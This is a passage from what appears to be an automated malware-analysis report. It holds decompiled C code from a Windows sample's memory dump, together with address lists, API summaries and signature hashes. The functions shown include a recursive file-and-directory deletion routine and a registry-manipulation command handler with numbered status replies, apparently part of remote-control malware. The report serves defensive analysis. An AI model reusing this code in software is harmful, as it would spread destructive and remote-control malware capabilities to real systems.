							_t213 = E00402F85(_t139,  &_v1160, E00402F85(_t139,  &_v1136, E00402F85(_t139,  &_v1088, E00402F85(_t139,  &_v1064, E00402FA9( &_v1208, E00401E3B( &_v1240, _t213, _t246, 1), 0x46e250), _t246, _t116), _t246, 0x46e250), _t246, _t115), _t246, 0x46e250);
							E00402F85(_t139, _t239 - 0x18, _t122, _t246,  &_v1220);
							_push(0x5e);
							E00404BB7(_t139, 0x46ea30, _t122, _t246);
							E00401FB9();
							E00401FB9();
							E00401FB9();
							E00401FB9();
							E00401FB9();
						}
						E00401FB9();
						E00401EE2();
					}
					L15:
					E00401E66( &_v1252, _t213);
					E00401FB9();
					return E00401FB9();
				}
			}




















































                                                                                                0x00415dc8
                                                                                                0x00415dc8
                                                                                                0x00415dd7
                                                                                                0x00415dda
                                                                                                0x00415df0
                                                                                                0x00415df5
                                                                                                0x00415e00
                                                                                                0x00415e05
                                                                                                0x00415e12
                                                                                                0x00415e1b
                                                                                                0x00415e20
                                                                                                0x00415e23
                                                                                                0x00415e26
                                                                                                0x00415ff3
                                                                                                0x00415ffd
                                                                                                0x00416006
                                                                                                0x00416024
                                                                                                0x00416026
                                                                                                0x00416029
                                                                                                0x004160f0
                                                                                                0x004160fa
                                                                                                0x004160ff
                                                                                                0x00416106
                                                                                                0x0041610f
                                                                                                0x00416118
                                                                                                0x00000000
                                                                                                0x00416118
                                                                                                0x0041603b
                                                                                                0x00416040
                                                                                                0x00416047
                                                                                                0x00416050
                                                                                                0x00416052
                                                                                                0x00416057
                                                                                                0x00416059
                                                                                                0x00416076
                                                                                                0x0041607f
                                                                                                0x0041607f
                                                                                                0x004160e1
                                                                                                0x004160ec
                                                                                                0x004160ee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00416098
                                                                                                0x0041609d
                                                                                                0x004160a4
                                                                                                0x004160ad
                                                                                                0x004160af
                                                                                                0x004160b4
                                                                                                0x004160b6
                                                                                                0x004160d3
                                                                                                0x004160dc
                                                                                                0x004160dc
                                                                                                0x004160b6
                                                                                                0x00000000
                                                                                                0x00415e2c
                                                                                                0x00415e2c
                                                                                                0x00415e2f
                                                                                                0x00415e46
                                                                                                0x00415e69
                                                                                                0x00415e73
                                                                                                0x00415e7c
                                                                                                0x00415e85
                                                                                                0x00415e8e
                                                                                                0x00415e93
                                                                                                0x00415e99
                                                                                                0x00415e9e
                                                                                                0x00415ea0
                                                                                                0x00415eb4
                                                                                                0x00415eb9
                                                                                                0x00415ebc
                                                                                                0x00415ec5
                                                                                                0x00415eda
                                                                                                0x00415ee3
                                                                                                0x00415f09
                                                                                                0x00415f12
                                                                                                0x00415f12
                                                                                                0x00415f28
                                                                                                0x00415f35
                                                                                                0x00415f8f
                                                                                                0x00415f93
                                                                                                0x00415f99
                                                                                                0x00415fa0
                                                                                                0x00415fa9
                                                                                                0x00415fb2
                                                                                                0x00415fbe
                                                                                                0x00415fca
                                                                                                0x00415fd3
                                                                                                0x00415fd3
                                                                                                0x00415fdc
                                                                                                0x00415fe5
                                                                                                0x00415fe5
                                                                                                0x0041611d
                                                                                                0x00416121
                                                                                                0x0041612d
                                                                                                0x00416140
                                                                                                0x00416140

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 0041601E
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 004160EA
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$CreateFirstNextchar_traits
                                                                                                • String ID: 0F$0F$PF$hpg$xF$xF
                                                                                                • API String ID: 3100282071-3544572515
                                                                                                • Opcode ID: b0ef1d4ba909f44ca38bbd72aee573efe1cfb39f2fc518f75783ab65502ace6b
                                                                                                • Instruction ID: f087f0ac7f1373f546d2dde8a312d5b6792c0cd2d904a53a363f0bae2689961c
                                                                                                • Opcode Fuzzy Hash: b0ef1d4ba909f44ca38bbd72aee573efe1cfb39f2fc518f75783ab65502ace6b
                                                                                                • Instruction Fuzzy Hash: 4E8162715082415BC314FB62C896EEFB3A8AFD0308F50493FF546671E2EF789949C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00418144, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00418144(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x466a50; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E004180CE( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E00418144( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}






































                                                                                                0x00418158
                                                                                                0x0041815b
                                                                                                0x0041815d
                                                                                                0x0041815f
                                                                                                0x0041815f
                                                                                                0x00418162
                                                                                                0x00418166
                                                                                                0x00418169
                                                                                                0x00418174
                                                                                                0x00418179
                                                                                                0x00418179
                                                                                                0x0041817d
                                                                                                0x00418180
                                                                                                0x00418185
                                                                                                0x00418190
                                                                                                0x00418192
                                                                                                0x00418194
                                                                                                0x0041819a
                                                                                                0x0041819e
                                                                                                0x004181a0
                                                                                                0x004181a0
                                                                                                0x004181a3
                                                                                                0x004181a7
                                                                                                0x004181aa
                                                                                                0x004181b5
                                                                                                0x004181ba
                                                                                                0x004181ba
                                                                                                0x004181be
                                                                                                0x004181c1
                                                                                                0x004181c6
                                                                                                0x004181cb
                                                                                                0x004181e1
                                                                                                0x004181e6
                                                                                                0x0041832e
                                                                                                0x00000000
                                                                                                0x0041832e
                                                                                                0x004181ec
                                                                                                0x004181ee
                                                                                                0x004181ee
                                                                                                0x004181f6
                                                                                                0x004181f9
                                                                                                0x00418201
                                                                                                0x00418206
                                                                                                0x0041820a
                                                                                                0x0041821a
                                                                                                0x0041831e
                                                                                                0x00418327
                                                                                                0x00418328
                                                                                                0x00000000
                                                                                                0x00418328
                                                                                                0x00418320
                                                                                                0x00418322
                                                                                                0x00000000
                                                                                                0x00418322
                                                                                                0x0041822d
                                                                                                0x004182ae
                                                                                                0x004182ae
                                                                                                0x00000000
                                                                                                0x004182ae
                                                                                                0x0041822f
                                                                                                0x00418237
                                                                                                0x00418239
                                                                                                0x00418239
                                                                                                0x0041823c
                                                                                                0x0041823f
                                                                                                0x0041824a
                                                                                                0x0041824c
                                                                                                0x0041824f
                                                                                                0x0041824f
                                                                                                0x00418253
                                                                                                0x00418256
                                                                                                0x0041825d
                                                                                                0x00418260
                                                                                                0x0041826e
                                                                                                0x0041826e
                                                                                                0x00418270
                                                                                                0x004182d2
                                                                                                0x004182e0
                                                                                                0x004182e0
                                                                                                0x004182f5
                                                                                                0x00000000
                                                                                                0x004182f7
                                                                                                0x004182f9
                                                                                                0x004182fb
                                                                                                0x004182fb
                                                                                                0x00418303
                                                                                                0x00418306
                                                                                                0x0041830e
                                                                                                0x00000000
                                                                                                0x00418313
                                                                                                0x004182f5
                                                                                                0x0041827f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041828c
                                                                                                0x00418294
                                                                                                0x00418296
                                                                                                0x00418296
                                                                                                0x0041829e
                                                                                                0x004182a1
                                                                                                0x004182a9
                                                                                                0x00000000
                                                                                                0x004182b1
                                                                                                0x004182b1
                                                                                                0x004182ba
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,0046E250,?), ref: 004181DB
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00418212
                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0041828C
                                                                                                • FindClose.KERNEL32(00000000), ref: 004182BA
                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 004182C3
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004182E0
                                                                                                • DeleteFileW.KERNEL32(?), ref: 004182ED
                                                                                                • GetLastError.KERNEL32 ref: 00418315
                                                                                                • FindClose.KERNEL32(00000000), ref: 00418328
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: 7f159fb5ff72aee02b57d84ced2c0041fc73070d10a3a262ab0951adb198760a
                                                                                                • Instruction ID: 9af4a0360b502a14f67a88d27646a8b5d0f81f3ec4db4f48889ca3042f25b490
                                                                                                • Opcode Fuzzy Hash: 7f159fb5ff72aee02b57d84ced2c0041fc73070d10a3a262ab0951adb198760a
                                                                                                • Instruction Fuzzy Hash: 9351E3355002198ACF259FA8CC886FAB375FF54708F4441EEE80997251EF768ECACB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00411234, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479registrylibraryloaderCOMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E00411234(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				struct _SECURITY_ATTRIBUTES _v104;
				char _v108;
				void* _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				void* _t88;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				signed int _t105;
				void* _t113;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t127;
				signed short* _t135;
				void* _t137;
				void* _t141;
				void* _t146;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t155;
				signed int _t156;
				intOrPtr* _t158;
				void* _t160;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t181;
				void* _t182;
				long _t185;
				signed short* _t195;
				void* _t205;
				void* _t217;
				void* _t233;
				void* _t247;
				signed int _t258;
				signed int _t313;
				signed int _t323;
				signed int _t326;
				void* _t328;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t339;
				signed int _t340;
				void* _t341;
				signed int _t347;
				signed int _t348;
				void* _t351;
				void* _t352;
				void* _t353;
				void* _t356;
				void* _t361;
				void* _t362;
				void* _t364;
				void* _t365;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t372;
				void* _t374;
				void* _t379;

				_t379 = __eflags;
				_t320 = __edx;
				_push(_t203);
				_t77 = E00401F87( &_a8);
				_push(0xffffffff);
				_t328 = 4;
				_push(_t328);
				_push( &_v52);
				E00404287( &_a8);
				_t351 = (_t348 & 0xfffffff8) - 0x44;
				E004020DE(_t203, _t351, __edx, _t379, 0x46e250);
				_t352 = _t351 - 0x18;
				E004020DE(_t203, _t352, __edx, _t379,  &_v68);
				E00417E68( &_v108, __edx);
				_t353 = _t352 + 0x30;
				_t335 =  *_t77 - 0x35;
				if(_t335 == 0) {
					E00401F5F(_t203,  &_v76);
					__eflags = E004021E7( &_v88) - 1;
					if(__eflags > 0) {
						E00409DFE(_t203,  &_v80, E00401F87(E00401E3B( &_v88, _t320, __eflags, 1)));
					}
					E004020DE(_t203, _t353 - 0x18, _t320, __eflags, E00401E3B( &_v88, _t320, __eflags, 0));
					_t88 = E00401EDD( &_v84);
					_t320 = 1;
					_t217 = _t88;
					L37:
					E00411075(_t217, _t320, _t386);
					L38:
					E00401EE2();
					L39:
					E00401E66( &_v88, _t320);
					E00401FB9();
					E00401FB9();
					return 0;
				}
				_t337 = _t335 - 1;
				if(_t337 == 0) {
					_t99 = E00401F87(E00401E3B( &_v88, __edx, __eflags, 2));
					_t101 = E00401F87(E00401E3B( &_v92, __edx, __eflags, 1));
					_t330 = 0;
					_t102 = E00401E3B( &_v96, __edx, __eflags, 0);
					_t356 = _t353 - 0x18;
					E004020DE(_t203, _t356, _t320, __eflags, _t102);
					_t104 = E00410FE4(_t203, __eflags, _t99);
					_t320 = _t101;
					_t105 = E00410D8B(_t104, _t101);
					_t358 = _t356 + 0x18 - 0x18;
					_t233 = _t356 + 0x18 - 0x18;
					__eflags = _t105;
					if(__eflags == 0) {
						_push("2");
						L33:
						E00402076(_t203, _t233);
						E00404BB7(_t203, 0x46e7b0, _t320, __eflags);
						goto L39;
					}
					_push("1");
					L20:
					E00402076(_t203, _t233);
					E00404BB7(_t203, 0x46e7b0, _t320, __eflags);
					E004020DE(_t203, _t358 - 0x18, _t320, __eflags, E00401E3B( &_v120, _t320, __eflags, _t330));
					_t113 = E00401F87(E00401E3B( &_v128, _t320, __eflags, 1));
					_t320 = 0;
					E00411075(_t113, 0, __eflags);
					goto L39;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					E00404260(_t203,  &_v80, E00401F87(E00401E3B( &_v88, __edx, __eflags, 1)));
					 *0x46dd58 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t120 = E00401EDD( &_v84);
					_t121 = E00401E3B( &_v96, _t320, __eflags, 0);
					_t361 = _t353 - 0x18;
					E004020DE(_t203, _t361, _t320, __eflags, _t121);
					_t123 = E00410FE4(_t203, __eflags, _t120);
					_t362 = _t361 + 0x18;
					__eflags =  *0x46dd58(_t123);
					if(__eflags != 0) {
						_t247 = _t362 - 0x18;
						_push("9");
						L12:
						E00402076(_t203, _t247);
						E00404BB7(_t203, 0x46e7b0, _t320, __eflags);
						goto L38;
					}
					_t127 = E0040247B();
					_t340 = 2;
					_t203 = E0041186A( &_v84, "\\", _t127 - _t340);
					__eflags = _t203 - 0xffffffff;
					if(__eflags != 0) {
						_t50 = _t203 + 1; // 0x1
						_push( ~(__eflags > 0) | _t50 * _t340);
						_v100 = E0043021B( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
						_t135 = E00401EDD(E0040746C( &_v84,  &_v36, 0, _t203));
						_t203 = _v112;
						_t323 = _v112 - _t135;
						__eflags = _t323;
						do {
							_t258 =  *_t135 & 0x0000ffff;
							 *(_t323 + _t135) = _t258;
							_t135 = _t135 + _t340;
							__eflags = _t258;
						} while (__eflags != 0);
						E00401EE2();
						_t137 = E00401E3B( &_v96, _t323, __eflags, 0);
						_t364 = _t362 - 0x18;
						E004020DE(_t203, _t364, _t323, __eflags, _t137);
						_t320 = 0;
						__eflags = 0;
						E00411075(_t203, 0, 0);
						E00430224(_t203);
						_t365 = _t364 + 0x1c;
						L28:
						_t247 = _t365 - 0x18;
						_push("8");
						goto L12;
					}
					_t141 = E00401E3B( &_v96, _t320, __eflags, 0);
					_t367 = _t362 - 0x18;
					E004020DE(_t203, _t367, _t320, __eflags, _t141);
					_t320 = 0;
					E00411075(0, 0, __eflags);
					_t365 = _t367 + 0x18;
					goto L28;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					_t146 = E004374E4(_t144, E00401F87(E00401E3B( &_v88, __edx, __eflags, 3)));
					__eflags = _t146 - _t328;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(E00401F87(E00401E3B( &_v92, __edx, __eflags, _t328)))));
						_t150 = E00401F87(E00401E3B( &_v92, __edx, __eflags, 2));
						_t152 = E00401F87(E00401E3B( &_v96, _t320, __eflags, 1));
						_t330 = 0;
						__eflags = 0;
						_t153 = E00401E3B( &_v100, _t320, 0, 0);
						_t368 = _t353 - 0x18;
						E004020DE(_t203, _t368, _t320, __eflags, _t153);
						_t155 = E00410FE4(_t203, __eflags, _t150);
						_t369 = _t368 + 0x18;
						_t320 = _t152;
						_t156 = E00410C27(_t155, _t152);
					} else {
						__eflags = _t146 - 0xb;
						if(__eflags == 0) {
							_t158 = E00401F87(E00401E3B( &_v92, __edx, __eflags, _t328));
							_t160 = E00401F87(E00401E3B( &_v92, __edx, __eflags, 2));
							_t162 = E00401F87(E00401E3B( &_v96, _t320, __eflags, 1));
							_t330 = 0;
							_t163 = E00401E3B( &_v100, _t320, __eflags, 0);
							_t370 = _t353 - 0x18;
							E004020DE(_t203, _t370, _t320, __eflags, _t163);
							_t165 = E00410FE4(_t203, __eflags, _t160);
							_t320 = _t162;
							_t156 = E00410C6B(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
							_t369 = _t370 + 0x24;
						} else {
							_push(_t146);
							E00401E3B( &_v92, __edx, __eflags, _t328);
							_push(E0040247B());
							_push(E00401F87(E00401E3B( &_v92, __edx, __eflags, _t328)));
							_t171 = E00401F87(E00401E3B( &_v96, _t320, __eflags, 2));
							_t173 = E00401F87(E00401E3B( &_v100, _t320, __eflags, 1));
							_t330 = 0;
							_t174 = E00401E3B( &_v104, _t320, __eflags, 0);
							_t372 = _t353 - 0x18;
							E004020DE(_t203, _t372, _t320, __eflags, _t174);
							_t176 = E00410FE4(_t203, __eflags, _t171);
							_t320 = _t173;
							_t156 = E00410B37(_t176, _t173);
							_t369 = _t372 + 0x28;
						}
					}
					_t358 = _t369 - 0x18;
					_t233 = _t369 - 0x18;
					__eflags = _t156;
					if(__eflags == 0) {
						_push("5");
						goto L33;
					} else {
						_push("4");
						goto L20;
					}
				}
				_t384 = _t341 != 1;
				if(_t341 != 1) {
					goto L39;
				}
				E00404260(_t203,  &_v80, E00401F87(E00401E3B( &_v88, __edx, _t384, 1)));
				_t181 = E00401EDD( &_v84);
				_t182 = E00401E3B( &_v96, __edx, _t384, 0);
				_t374 = _t353 - 0x18;
				E004020DE(_t203, _t374, __edx, _t384, _t182);
				_t185 = RegCreateKeyExW(E00410FE4(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
				RegCloseKey(_v112);
				_t376 = _t374 + 0x18 - 0x18;
				_t247 = _t374 + 0x18 - 0x18;
				_t385 = _t185;
				if(_t185 != 0) {
					_push("7");
					goto L12;
				}
				E00402076(_t203, _t247, "6");
				_push(0x72);
				E00404BB7(_t203, 0x46e7b0, _t320, _t385);
				_t205 = E00407486( &_v108, 0x46e7b0, 0x46e7b0);
				_t386 = _t205 - 0xffffffff;
				if(_t205 != 0xffffffff) {
					_t14 = _t205 + 1; // 0x1
					_t347 = 2;
					_push( ~(__eflags > 0) | _t14 * _t347);
					_v112 = E0043021B( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
					_t195 = E00401EDD(E0040746C( &_v96,  &_v48, 0, _t205));
					_t206 = _v124;
					_t326 = _v124 - _t195;
					__eflags = _t326;
					do {
						_t313 =  *_t195 & 0x0000ffff;
						 *(_t326 + _t195) = _t313;
						_t195 = _t195 + _t347;
						__eflags = _t313;
					} while (__eflags != 0);
					E00401EE2();
					E004020DE(_t206, _t376 - 0x18, _t326, __eflags, E00401E3B( &_v108, _t326, __eflags, 0));
					_t320 = 0;
					E00411075(_t206, 0, __eflags);
					E00430224(_t206);
					goto L38;
				}
				E004020DE(_t205, _t376 - 0x18, _t320, _t386, E00401E3B( &_v108, _t320, _t386, 0));
				_t320 = 0;
				_t217 = 0;
				goto L37;
			}

























































































                                                                                                0x00411234
                                                                                                0x00411234
                                                                                                0x00411240
                                                                                                0x00411243
                                                                                                0x00411248
                                                                                                0x0041124c
                                                                                                0x00411252
                                                                                                0x00411257
                                                                                                0x00411258
                                                                                                0x0041125d
                                                                                                0x00411267
                                                                                                0x0041126c
                                                                                                0x00411276
                                                                                                0x0041127f
                                                                                                0x00411284
                                                                                                0x00411287
                                                                                                0x0041128a
                                                                                                0x0041179a
                                                                                                0x004117a8
                                                                                                0x004117ab
                                                                                                0x004117c4
                                                                                                0x004117c4
                                                                                                0x004117da
                                                                                                0x004117e3
                                                                                                0x004117e8
                                                                                                0x004117ea
                                                                                                0x004117ec
                                                                                                0x004117ec
                                                                                                0x004117f4
                                                                                                0x004117f8
                                                                                                0x004117fd
                                                                                                0x00411801
                                                                                                0x0041180a
                                                                                                0x00411812
                                                                                                0x0041181f
                                                                                                0x0041181f
                                                                                                0x00411290
                                                                                                0x00411293
                                                                                                0x00411728
                                                                                                0x0041173b
                                                                                                0x00411740
                                                                                                0x00411749
                                                                                                0x0041174e
                                                                                                0x00411754
                                                                                                0x00411759
                                                                                                0x00411761
                                                                                                0x00411765
                                                                                                0x0041176b
                                                                                                0x0041176e
                                                                                                0x00411770
                                                                                                0x00411772
                                                                                                0x0041177e
                                                                                                0x00411783
                                                                                                0x00411783
                                                                                                0x0041178f
                                                                                                0x00000000
                                                                                                0x0041178f
                                                                                                0x00411774
                                                                                                0x0041157d
                                                                                                0x0041157d
                                                                                                0x00411589
                                                                                                0x0041159e
                                                                                                0x004115b0
                                                                                                0x004115b5
                                                                                                0x004115b9
                                                                                                0x00000000
                                                                                                0x004115be
                                                                                                0x00411299
                                                                                                0x0041129c
                                                                                                0x004115e7
                                                                                                0x00411607
                                                                                                0x0041160c
                                                                                                0x00411619
                                                                                                0x0041161e
                                                                                                0x00411624
                                                                                                0x00411629
                                                                                                0x0041162e
                                                                                                0x00411638
                                                                                                0x0041163a
                                                                                                0x0041170f
                                                                                                0x00411711
                                                                                                0x004113f1
                                                                                                0x004113f1
                                                                                                0x004113fd
                                                                                                0x00000000
                                                                                                0x004113fd
                                                                                                0x00411644
                                                                                                0x0041164b
                                                                                                0x0041165d
                                                                                                0x0041165f
                                                                                                0x00411662
                                                                                                0x00411689
                                                                                                0x00411695
                                                                                                0x0041169d
                                                                                                0x004116b2
                                                                                                0x004116b7
                                                                                                0x004116bd
                                                                                                0x004116bd
                                                                                                0x004116bf
                                                                                                0x004116bf
                                                                                                0x004116c2
                                                                                                0x004116c6
                                                                                                0x004116c8
                                                                                                0x004116c8
                                                                                                0x004116d1
                                                                                                0x004116db
                                                                                                0x004116e0
                                                                                                0x004116e6
                                                                                                0x004116eb
                                                                                                0x004116eb
                                                                                                0x004116ef
                                                                                                0x004116f5
                                                                                                0x004116fa
                                                                                                0x004116fd
                                                                                                0x00411700
                                                                                                0x00411702
                                                                                                0x00000000
                                                                                                0x00411702
                                                                                                0x00411669
                                                                                                0x0041166e
                                                                                                0x00411674
                                                                                                0x00411679
                                                                                                0x0041167d
                                                                                                0x00411682
                                                                                                0x00000000
                                                                                                0x00411682
                                                                                                0x004112a2
                                                                                                0x004112a5
                                                                                                0x0041141a
                                                                                                0x00411424
                                                                                                0x00411426
                                                                                                0x00411520
                                                                                                0x0041152b
                                                                                                0x0041153e
                                                                                                0x00411543
                                                                                                0x00411543
                                                                                                0x0041154c
                                                                                                0x00411551
                                                                                                0x00411557
                                                                                                0x0041155c
                                                                                                0x00411561
                                                                                                0x00411564
                                                                                                0x00411568
                                                                                                0x0041142c
                                                                                                0x0041142c
                                                                                                0x0041142f
                                                                                                0x004114b1
                                                                                                0x004114c8
                                                                                                0x004114db
                                                                                                0x004114e0
                                                                                                0x004114e9
                                                                                                0x004114ee
                                                                                                0x004114f4
                                                                                                0x004114f9
                                                                                                0x00411501
                                                                                                0x00411505
                                                                                                0x0041150a
                                                                                                0x00411431
                                                                                                0x00411431
                                                                                                0x00411433
                                                                                                0x0041143f
                                                                                                0x00411451
                                                                                                0x0041145f
                                                                                                0x00411472
                                                                                                0x00411477
                                                                                                0x00411480
                                                                                                0x00411485
                                                                                                0x0041148b
                                                                                                0x00411490
                                                                                                0x00411498
                                                                                                0x0041149c
                                                                                                0x004114a1
                                                                                                0x004114a1
                                                                                                0x0041142f
                                                                                                0x0041156f
                                                                                                0x00411572
                                                                                                0x00411574
                                                                                                0x00411576
                                                                                                0x004115c6
                                                                                                0x00000000
                                                                                                0x00411578
                                                                                                0x00411578
                                                                                                0x00000000
                                                                                                0x00411578
                                                                                                0x00411576
                                                                                                0x004112ab
                                                                                                0x004112ae
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004112cb
                                                                                                0x004112e5
                                                                                                0x004112f0
                                                                                                0x004112f5
                                                                                                0x004112fb
                                                                                                0x00411309
                                                                                                0x00411315
                                                                                                0x0041131b
                                                                                                0x0041131e
                                                                                                0x00411320
                                                                                                0x00411322
                                                                                                0x004113ec
                                                                                                0x00000000
                                                                                                0x004113ec
                                                                                                0x0041132d
                                                                                                0x00411332
                                                                                                0x00411339
                                                                                                0x00411349
                                                                                                0x0041134b
                                                                                                0x0041134e
                                                                                                0x00411370
                                                                                                0x00411375
                                                                                                0x0041137f
                                                                                                0x00411387
                                                                                                0x0041139c
                                                                                                0x004113a1
                                                                                                0x004113a7
                                                                                                0x004113a7
                                                                                                0x004113a9
                                                                                                0x004113a9
                                                                                                0x004113ac
                                                                                                0x004113b0
                                                                                                0x004113b2
                                                                                                0x004113b2
                                                                                                0x004113bb
                                                                                                0x004113d0
                                                                                                0x004113d5
                                                                                                0x004113d9
                                                                                                0x004113df
                                                                                                0x00000000
                                                                                                0x004113e4
                                                                                                0x00411360
                                                                                                0x00411365
                                                                                                0x00411367
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411309
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411315
